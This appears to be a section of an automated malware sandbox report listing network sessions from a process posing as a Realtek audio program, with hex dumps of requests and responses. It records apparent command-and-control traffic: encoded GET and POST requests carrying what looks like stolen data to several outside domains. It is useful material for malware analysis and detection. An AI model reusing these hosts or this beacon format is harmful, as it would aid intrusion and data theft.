                                                                                                  Data Ascii: bZ4Fw)_~0@hZ$2[`CpL;n,*HQV!R(m{:B=N;lm`2xhAB?'IxZ;`}SfTO13CHp:tr}cme+CWH2^3PYIFsV\.@G8')P\gT&#*bDKp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  56192.168.11.3049921185.68.16.160805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:08.066049099 CET411OUTGET /smoc/?6aonl5x=lPVxR6/rWOJUAmNkBdPYmYT9z/j33Ol+ibkJWFBTXqAA3JwmClrtL6XObj0m4TTFla53vfd2ewxujMvJwABfMfcmIBnaaalZ+S7LqTZAqXv17vO/nvgn6IY=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.dymar.shop
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:51:08.410832882 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:08 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: OCSESSID=e1c60ec7c81c2baf585215f2f9; path=/
                                                                                                  Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:51:08 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  Set-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:51:08 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                                  x-ray: wnp32698:0.130/wn32698:0.130/wa32698:D=129196
                                                                                                  Data Raw: 34 33 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 79 6d 61 72 2e 73 68 6f 70 22 20 2f 3e 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 [TRUNCATED]
                                                                                                  Data Ascii: 4375<!DOCTYPE html>...[if IE]><![endif]-->...[if IE 8 ]><html dir="ltr" lang="ru" class="ie8"><![endif]-->...[if IE 9 ]><html dir="ltr" lang="ru" class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]>...><html dir="ltr" lang="ru">...<![endif]--><head> <link rel="canonical" href="https://www.dymar.shop" /> <meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> !</title><base href="https://www.dymar.shop/" /><link href="catalog/view/javascript/bootstrap/css/bootstrap.min.css" rel="stylesheet" media="screen" /><link href="catalog/view/javascript/font-awesome/css/font-awesome.min.css" rel="stylesheet" t
                                                                                                  Dec 3, 2024 09:51:08.410864115 CET1289INData Raw: 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 61 74 61 6c 6f 67 2f 76 69 65 77 2f 74 68 65 6d 65 2f 6e 69 63 65 2f 73 74 79 6c 65 73 68 65 65 74 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 72
                                                                                                  Data Ascii: ype="text/css" /><link href="catalog/view/theme/nice/stylesheet/stylesheet.css" rel="stylesheet"><link href="//fonts.googleapis.com/css?family=Inter:100,100i,300,300i,400,400i,700,700i,900,900i" rel="stylesheet" type="text/css" /><script sr
                                                                                                  Dec 3, 2024 09:51:08.410880089 CET1289INData Raw: 8b d0 bc d0 b0 d1 80 d1 8c 22 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 6e 61 76 20 69 64 3d 22 74 6f 70 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65
                                                                                                  Data Ascii: " > </head><body><nav id="top"> <div class="container top-container"> ... Menu Top --><nav id="menu-top" class="navbar pull-left"> <ul class="nav navbar-nav"> <li><a href="/"></a></li>
                                                                                                  Dec 3, 2024 09:51:08.410913944 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 63 75 72 72 65 6e 63 79 2d 73 65 6c 65 63 74 20 62 74 6e 20 62
                                                                                                  Data Ascii: <li> <button class="currency-select btn btn-link btn-block" type="button" name="RUB">. </button> </li> </ul> </div> <input type="hidden" name="code" val
                                                                                                  Dec 3, 2024 09:51:08.410931110 CET1289INData Raw: 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 20 62 74 6e 2d 62 6c 6f 63 6b 20 6c 61 6e 67 75 61 67 65 2d 73 65 6c 65 63 74 22 20 74 79 70 65 3d
                                                                                                  Data Ascii: <li> <button class="btn btn-link btn-block language-select" type="button" name="uk-ua"><img src="catalog/language/uk-ua/uk-ua.png" alt="" title="" /> </button>
                                                                                                  Dec 3, 2024 09:51:08.410947084 CET1289INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 79 6d 61 72 2e 73 68 6f 70 2f 69 6e 64 65 78 2e 70 68 70 3f 72 6f 75 74 65 3d 61 63 63 6f 75 6e 74 2f 6c 6f 67 69 6e 22 3e d0 90 d0 b2 d1 82 d0 be d1 80 d0 b8 d0 b7 d0 b0 d1 86 d0 b8 d1 8f
                                                                                                  Data Ascii: href="https://www.dymar.shop/index.php?route=account/login"></a></li> </ul> </div> </div> </div> </div></nav><header> <div class="container"> <div id="top-2">
                                                                                                  Dec 3, 2024 09:51:08.410970926 CET1289INData Raw: 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 36 22 20 3e d0 9a d0 be d0 bc d0 bf d0 bb d0 b5 d0 ba d1 82 d1 83 d1 8e d1 89 d0 b8 d0 b5 20 d0 ba 20 d1 83 d0 bb d1 8c d1 8f d0 bc 3c 2f
                                                                                                  Data Ascii: <option value="6" > </option> <option value="7" > </option> <option value="8
                                                                                                  Dec 3, 2024 09:51:08.410989046 CET1289INData Raw: 81 d0 ba d0 be d1 82 d0 be d0 bf d0 ba d0 b8 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 31 38 22 20 3e 20 26 6e 62
                                                                                                  Data Ascii: </option> <option value="18" > &nbsp;- </option> <option value="19" ></option>
                                                                                                  Dec 3, 2024 09:51:08.411026955 CET1289INData Raw: 81 d0 b5 d1 82 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 32 38 22 20 3e 20 26 6e 62 73 70 3b 20 2d 2d 20 d0 9c d0 b5 d0 b4 d0 be d0 b3 d0 be d0 bd
                                                                                                  Data Ascii: </option> <option value="28" > &nbsp; -- 3- </option> <option value="29" > &nbsp; -- 2 -
                                                                                                  Dec 3, 2024 09:51:08.411046982 CET1289INData Raw: 6d 6e 20 68 65 61 64 65 72 2d 69 63 6f 6e 73 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 69 63 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 72 69 67 68 74 22 3e 20 20
                                                                                                  Data Ascii: mn header-icons-column"> <div class="header-icons-container text-right"> <div class="header-icons-item"> <a href="https://www.dymar.shop/index.php?route=information/contact"> <span class="f
                                                                                                  Dec 3, 2024 09:51:08.622250080 CET1289INData Raw: 2d 69 63 6f 6e 2d 6c 61 62 65 6c 20 68 69 64 64 65 6e 2d 78 73 22 3e d0 a1 d1 80 d0 b0 d0 b2 d0 bd d0 b5 d0 bd d0 b8 d0 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                                  Data Ascii: -icon-label hidden-xs"></span> </a> </div> </div> </div> <div class="top-2--column cart-column text-right"><div id="cart" class="dropdown"> <button


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  57192.168.11.3049922185.134.245.113805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:14.100228071 CET669OUTPOST /y1af/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bahaeng.com
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.bahaeng.com
                                                                                                  Referer: http://www.bahaeng.com/y1af/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 6f 6a 78 66 35 66 47 57 37 5a 79 72 57 66 39 5a 4d 67 46 31 4b 74 46 33 31 30 50 31 47 6d 79 76 7a 4a 79 31 41 30 32 4c 39 58 36 61 44 6c 34 50 65 4a 59 41 6d 79 4e 53 64 2b 48 53 42 6a 58 4a 71 39 47 56 66 75 6e 46 32 51 59 58 64 41 51 6d 37 75 70 69 33 4a 62 42 54 48 79 71 42 57 6b 67 57 35 52 36 4e 33 37 71 34 55 58 6d 51 32 4c 64 6c 4a 58 36 74 32 66 68 4a 31 69 72 76 62 42 39 59 55 52 31 75 43 30 47 39 6f 72 43 4d 53 7a 4e 67 78 70 4c 77 31 35 41 4e 64 77 4f 65 56 75 6f 43 41 72 30 67 41 44 47 6e 2b 46 35 59 31 34 59 79 2b 33 73 79 35 6a 42 51 6d 59 50 4d 45 58 2b 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=Fojxf5fGW7ZyrWf9ZMgF1KtF310P1GmyvzJy1A02L9X6aDl4PeJYAmyNSd+HSBjXJq9GVfunF2QYXdAQm7upi3JbBTHyqBWkgW5R6N37q4UXmQ2LdlJX6t2fhJ1irvbB9YUR1uC0G9orCMSzNgxpLw15ANdwOeVuoCAr0gADGn+F5Y14Yy+3sy5jBQmYPMEX+Q==
                                                                                                  Dec 3, 2024 09:51:14.307923079 CET716INHTTP/1.1 405 Not Allowed
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:14 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                  Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  58192.168.11.3049923185.134.245.113805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:16.837585926 CET689OUTPOST /y1af/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bahaeng.com
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.bahaeng.com
                                                                                                  Referer: http://www.bahaeng.com/y1af/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 6f 6a 78 66 35 66 47 57 37 5a 79 71 32 50 39 57 4e 67 46 79 71 74 45 34 56 30 50 67 57 6e 35 76 7a 46 79 31 45 73 6d 4c 6f 48 36 5a 6a 56 34 49 62 6c 59 46 6d 79 4e 4b 74 2b 43 4b 68 6a 4d 4a 71 77 7a 56 65 53 6e 46 79 34 59 58 64 51 51 6c 4b 75 6d 69 6e 4a 56 4e 7a 48 77 75 42 57 6b 67 57 35 52 36 4e 79 63 71 34 4d 58 36 77 47 4c 63 42 6c 55 6b 64 32 51 6d 4a 31 69 76 76 62 46 39 59 55 57 31 72 2b 65 47 2f 51 72 43 49 65 7a 4e 79 56 75 51 67 31 2f 65 39 63 33 48 38 30 46 68 78 41 55 2f 44 6b 6d 66 47 7a 6c 34 50 59 69 46 78 4b 31 2f 53 46 4f 64 52 4c 77 4e 4f 46 4d 6a 56 64 6b 6a 6d 69 6a 41 6c 41 76 4d 78 62 44 72 59 76 44 66 79 67 3d
                                                                                                  Data Ascii: 6aonl5x=Fojxf5fGW7Zyq2P9WNgFyqtE4V0PgWn5vzFy1EsmLoH6ZjV4IblYFmyNKt+CKhjMJqwzVeSnFy4YXdQQlKuminJVNzHwuBWkgW5R6Nycq4MX6wGLcBlUkd2QmJ1ivvbF9YUW1r+eG/QrCIezNyVuQg1/e9c3H80FhxAU/DkmfGzl4PYiFxK1/SFOdRLwNOFMjVdkjmijAlAvMxbDrYvDfyg=
                                                                                                  Dec 3, 2024 09:51:17.039356947 CET716INHTTP/1.1 405 Not Allowed
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:16 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                  Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  59192.168.11.3049924185.134.245.113805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:19.572068930 CET1289OUTPOST /y1af/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bahaeng.com
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.bahaeng.com
                                                                                                  Referer: http://www.bahaeng.com/y1af/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 6f 6a 78 66 35 66 47 57 37 5a 79 71 32 50 39 57 4e 67 46 79 71 74 45 34 56 30 50 67 57 6e 35 76 7a 46 79 31 45 73 6d 4c 72 6e 36 5a 53 31 34 4f 38 78 59 43 6d 79 4e 55 64 2b 44 4b 68 69 63 4a 75 55 33 56 65 66 61 46 77 41 59 58 37 63 51 74 59 57 6d 73 6e 4a 56 58 54 48 31 71 42 57 39 67 57 70 56 36 4e 43 63 71 34 4d 58 36 32 71 4c 4d 6c 4a 55 6d 64 32 66 68 4a 31 75 72 76 61 69 39 59 4d 67 31 71 75 6b 47 39 67 72 46 2f 61 7a 4f 41 4e 75 51 67 31 2f 4b 74 63 4d 48 38 34 45 68 77 6f 41 2f 43 64 45 66 58 58 6c 36 4c 56 66 58 51 53 43 6a 41 4a 45 52 67 48 66 46 4d 74 66 6b 69 64 54 73 6c 75 74 49 78 51 53 4d 57 62 35 36 49 69 45 4e 45 55 5a 57 37 46 38 37 70 2b 77 58 48 72 47 51 74 78 36 4a 63 76 43 54 39 47 74 34 6a 4c 4d 53 2f 44 76 63 4d 64 67 4d 54 2b 58 2f 31 77 2b 6d 61 55 44 6e 54 48 4e 75 75 48 6a 6a 4f 62 56 54 53 53 44 76 76 64 69 34 72 4f 62 45 56 69 62 59 66 79 41 75 79 2f 6a 58 35 33 72 35 45 4a 61 36 33 6c 4d 4f 57 41 6c 43 30 4d 58 32 72 75 65 67 52 62 54 65 55 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=Fojxf5fGW7Zyq2P9WNgFyqtE4V0PgWn5vzFy1EsmLrn6ZS14O8xYCmyNUd+DKhicJuU3VefaFwAYX7cQtYWmsnJVXTH1qBW9gWpV6NCcq4MX62qLMlJUmd2fhJ1urvai9YMg1qukG9grF/azOANuQg1/KtcMH84EhwoA/CdEfXXl6LVfXQSCjAJERgHfFMtfkidTslutIxQSMWb56IiENEUZW7F87p+wXHrGQtx6JcvCT9Gt4jLMS/DvcMdgMT+X/1w+maUDnTHNuuHjjObVTSSDvvdi4rObEVibYfyAuy/jX53r5EJa63lMOWAlC0MX2ruegRbTeUjLeh4FIFXkErYkL81fDHrv4ppF9Dtf0yK2zGLdN8mKrJv8Y6rq4zUYlxLH2PTf3+o0m+SpEUiQ4KNsl1Mfdu1IGdv+SCuYphhgd1xgQ0I2NuPBJn+zbwr+IjtlMUTlWgS9f5BX2pG4kVCwO0s69KKl4p+S8VBpEqu6KXtaYeNY6aedPpeo6Wg48jcQKbixsoYV3xG9cJyEVL45tzBghbM6cNO2Fmms93wHPmg0AZWZjW+xKAr47WOHl7g7EP6WO4Mrn4FE/ZJDVg6//0SaPGFsURPqn6OMa9oyVMXwi8K7TI0bWnyrVAS6YpaXf+tPOnQbgg7FWY+YiDXzcDWm9SSmspuOksWbau2o98HAqB05/oK27VbzibjbJ/HXwV1BI8Y2Ax751J8aG1iFnl3TRzbOkfONtz0+XuBrYo92hAPsM34qrpduhBVO4by+WPJiWf1sJZgyZ19Ie7lHWW3F3cY/bHg//PuT/cLBnAP
                                                                                                  Dec 3, 2024 09:51:19.572122097 CET2517OUTData Raw: 39 4c 31 66 6f 72 6b 37 51 7a 51 43 37 74 4b 34 6c 54 38 5a 46 30 4e 44 43 65 62 6a 35 4a 78 36 50 44 37 63 56 49 64 56 70 38 6c 56 4a 73 52 43 6e 46 54 4b 31 4b 41 2b 47 52 49 64 31 71 31 31 79 53 66 48 61 57 33 53 45 46 75 69 76 56 6a 55 77 4d
                                                                                                  Data Ascii: 9L1fork7QzQC7tK4lT8ZF0NDCebj5Jx6PD7cVIdVp8lVJsRCnFTK1KA+GRId1q11ySfHaW3SEFuivVjUwM5VCVc32BO+5qHbzeXM0pLII4yJ1fWPnCNDVNT3Zm+2O4pHQvvof+mgeFd2g1P6TA9dC1hlYt2DT2eqqGWIg//nxRFbB99bXHg39trD6MuWOcO+jnOBeT1FUaltWdMKNjASBF1fwInxwT0z/OP58wsxXjqhO1OJy/x
                                                                                                  Dec 3, 2024 09:51:19.773884058 CET716INHTTP/1.1 405 Not Allowed
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:19 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                  Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  60192.168.11.3049925185.134.245.113805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:22.307570934 CET412OUTGET /y1af/?6aonl5x=IqLRcMuEYJF3qnHudOsUzMwj/zs+8hv653U5jAETSKTHOAZ6DMxoKSmDfoiNXSDpEOcnUvDePh8sSvYUl7mpsmobIWXHnSvdrxN11MHL3cA/rWK2VFF3/cE=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bahaeng.com
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:51:22.513396025 CET1289INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:51:22 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Expires: Tue, 03 Dec 2024 09:51:22 GMT
                                                                                                  Cache-Control: max-age=3600
                                                                                                  Cache-Control: public
